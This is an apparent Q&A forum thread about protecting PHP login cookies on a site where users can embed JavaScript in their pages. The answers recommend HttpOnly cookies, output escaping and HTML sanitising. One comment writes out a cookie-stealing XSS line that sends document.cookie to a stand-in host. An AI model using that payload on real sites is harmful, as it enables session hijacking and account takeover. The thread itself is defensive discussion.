# How can I protect my PHP cookies from JavaScript on user's pages?

Tags: php, javascript, cookies, authentication, alert

I have a script (Programmed by me), in this script, the visitors can register and login(User information is stored in cookies)... After registration they can edit their personal page.. the probleme : this page accept javascript codes and anyone can get the cookies using document.cookie :(

I try to create Regular Expression to clean document.cookie tag from the user page, but it's not good solutions because the users can put : `<script src="filejs.js"></script>` and write in filejs.js for example this code `alert(document.cookie);` , this code will not found to clean....

Session is save but it's not save for long time(`time()+60*24*300`) :(

Thank you.

Answer (score 1):

Why are you trying to prevent the user from seeing their own cookie? They already can, cookies are stored on their computer.

If you want to prevent someone from putting scripts into your page, use [`strip_tags`](http://www.php.net/manual/en/function.strip-tags.php) to remove HTML from the input, or [`htmlspecialchars`](http://php.net/manual/en/function.htmlspecialchars.php) to display it as plain text.

Comment: Yes but they can put chat box not save, for example you write new message in the chat like this: 
document.location = "http://yoursite.com/index.php?cookie="+document.cookie;
the user cookies insert in your site and you can access to his account :s

Answer (score 1):

It is very difficult to be secure while letting users include JavaScript in your pages. You won't be able to achieve this on your own with regular expressions. You'll need to use a heavyweight solution like [Google's Caja project](http://code.google.com/p/google-caja/).

Other security issues aside, you can protect your cookies from JavaScript [by using the HttpOnly flag](http://www.codinghorror.com/blog/2008/08/protecting-your-cookies-httponly.html). You can use it in PHP by [passing `setcookie()` a true value for the `$httponly` argument](http://php.net/manual/en/function.setcookie.php).

Comment: The users can't get cookie using javascript if I set httponly = true ??

Comment: @Davidcoder: That's right, but only in newer browsers, it doesn't work in older browsers. And without something like Caja, there will be other ways to hack your site aside from just stealing cookies.

Comment: OK
I will use sessions to save only password and cookies for save username and edit session life time to a hour
$_COOKIE["username"]
$_SESSION["password"]
is it save ?

Comment: @Davidcoder: Probably not. There are tons of different XSS attacks that are possible when you let users run JavaScript on your site. The details depend on your site.

Comment: There are some sites give pages like http://piczo.com/ ... you can use javascript , but there is no problemes.. Please help meee :(

Comment: @Davidcoder: I can hack that site. It is not secure. You can secure some sites if you isolate each user to a specific subdomain, but that doesn't work for everything. *There is so simple solution.*

Comment: @Davidcoder: Don't try to let users embed JavaScript unless you already understand security in depth, or your site will be hacked.

Answer (score 1):

The best way to prevent javascript from accessing cookies, set the [HttpOnly](https://www.owasp.org/index.php/HttpOnly) flag on the cookie. In PHP, this can be applied to session cookies using the [session.cookie-httponly](http://www.php.net/manual/en/session.configuration.php#ini.session.cookie-httponly) ini directive. If you're setting a cookie using [setcookie()](http://www.php.net/manual/en/function.setcookie.php), you can set the optional `$httponly` parameter to `TRUE`.

Answer (score 0):

You cannot prevent users from seeing their own cookies - even if you remove all HTML etc.

All they need is Firefox with live http headers. As another poster has mentioned - why nick the biscuit off them when you have given it to them?

Answer (score 0):

> After registration they can edit their personal page.. the probleme : this page accept javascript codes…

So FIX THAT (e.g, by using an HTML sanitizer, or by using a markup language that is not HTML). What you're describing is not a feature — it's a serious security vulnerability — and it cannot be papered over effectively by tweaking your sessions. That'd amount to rearranging the deck chairs on the Titanic.